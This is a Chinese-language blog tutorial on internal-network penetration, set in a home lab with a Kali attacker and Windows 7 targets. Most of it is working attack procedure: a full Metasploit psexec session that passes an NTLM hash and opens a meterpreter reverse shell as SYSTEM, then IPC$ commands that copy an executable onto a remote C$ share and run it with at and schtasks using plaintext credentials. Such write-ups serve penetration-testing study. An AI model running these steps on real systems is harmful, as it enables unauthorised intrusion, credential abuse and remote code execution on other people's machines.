【内网必修】hash传递-ipc$

发表于 | 分类于 | 热度

这些是刚接触内网的时候了解到的,之前的blog也是写有的。

hsah传递

详细原理就看这里:刨根问底:Hash传递攻击原理探究

测试环境:(本机)

  • 目标机:
    Windows 7 Ultimate
192.168.1.106
  • 攻击机:
    Linux 4.6.0-kali1-amd64 
192.168.1.107 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.107
LHOST => 192.168.1.107
msf exploit(psexec) > set LPORT 1024
LPORT => 1024
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

  	Name                  Current Setting  Required  Description
  	----                  ---------------  --------  -----------
  	RHOST                                  yes       The target address
  	RPORT                 445              yes       The SMB service port (TCP)
  	SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
  	SERVICE_DISPLAY_NAME                   no        The service display name
  	SERVICE_NAME                           no        The service name
  	SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
  	SMBDomain             .                no        The Windows domain to use for authentication
  	SMBPass                                no        The password for the specified username
  	SMBUser                                no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

  	Name      Current Setting  Required  Description
  	----      ---------------  --------  -----------
  	EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
  	LHOST     192.168.1.107    yes       The listen address
  	LPORT     1024             yes       The listen port


Exploit target:

  	Id  Name
  	--  ----
  	0   Automatic


msf exploit(psexec) > set RHOST 192.168.1.106
RHOST => 192.168.1.106
msf exploit(psexec) > set smbuser rcoil
smbuser => rcoil
msf exploit(psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
smbpass => aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf exploit(psexec) > exploit 

[*] Started reverse TCP handler on 192.168.1.107:1024 
[*] 192.168.1.106:445 - Connecting to the server...
[*] 192.168.1.106:445 - Authenticating to 192.168.1.106:445 as user 'rcoil'...
[*] 192.168.1.106:445 - Selecting PowerShell target
[*] 192.168.1.106:445 - Executing the payload...
[+] 192.168.1.106:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957487 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.107:1024 -> 192.168.1.106:50209) at 2017-03-02 06:20:15 +0800
meterpreter > shell
Process 3460 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7600]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>whoami  
whoami
nt authority\system

ipc$

内网渗透里面不管域还是工作组最先需要介绍的就是ipc连接,这个是内网渗透必修科目,后面绝大多数操作都要基于ipc连接。

ipc$的作用

利用IPC$,连接者甚至可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主机上的目录结构、用户列表等信息。
dir、copy、xcopy、move、type 等参数都可以使用 UNC 路径(何为 UNC 路径?简单来讲以 \ 开头的路径就是UNC路径)。

ipc$-1

计划任务

说到ipc$,最多的就会提到atschtasks

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
C:\Users\John\Desktop>md \\192.168.1.67\c$\users\public\base\

C:\Users\John\Desktop>copy base.exe \\192.168.1.67\c$\users\public\base\
        1 file(s) copied.

C:\Users\John\Desktop>copy bat.bat \\192.168.1.67\c$\users\public\base\
        1 file(s) copied.

C:\Users\John\Desktop>dir \\192.168.1.67\c$\users\public\base\
 Volume in drive \\192.168.1.67\c$ is Windows 7
 Volume Serial Number is 44F3-57F8

 Directory of \\192.168.1.67\c$\users\public\base

08/30/2017  02:35 AM    <DIR>          .
08/30/2017  02:35 AM    <DIR>          ..
08/11/2013  12:40 AM            43,520 base.exe
08/30/2017  02:32 AM                32 bat.bat
               2 File(s)         43,552 bytes
               2 Dir(s)  55,193,870,336 bytes free

C:\Users\John\Desktop>at \\192.168.1.67 4:40 c:\users\public\base\bat.bat
dded a new job with job ID = 1

...

删除at任务
at  /delete /y

schtasks是at的升级版。

1
2
3
schtasks /create /tn "base" /tr c:\users\public\base\base.bat /sc once /st 4:50 /S 192.168.1.67 /RU System  /u admin /p "1"
schtasks /run /tn "base" /S 192.168.1.67  /u admin /p "1" /i  #立即执行
schtasks /F /delete /tn "base" /S 192.168.1.67 /u admin /p "1"

/create表示创建计划任务,/tn 表示任务名,/tr指定运行的文件,/sc 是任务运行频率,/st 是执行时间,/s 指定远程机器名或 ip 地址,/ru 指定运行任务的用户权限,这里指定为最高的 SYSTEM,/i 表示立即运行,/F 表示如果指定的任务已经存在,则强制创建任务并抑制警告,/delete是删除任务。

RcoIl Alipay
!坚持技术分享,您的支持将鼓励我继续创作!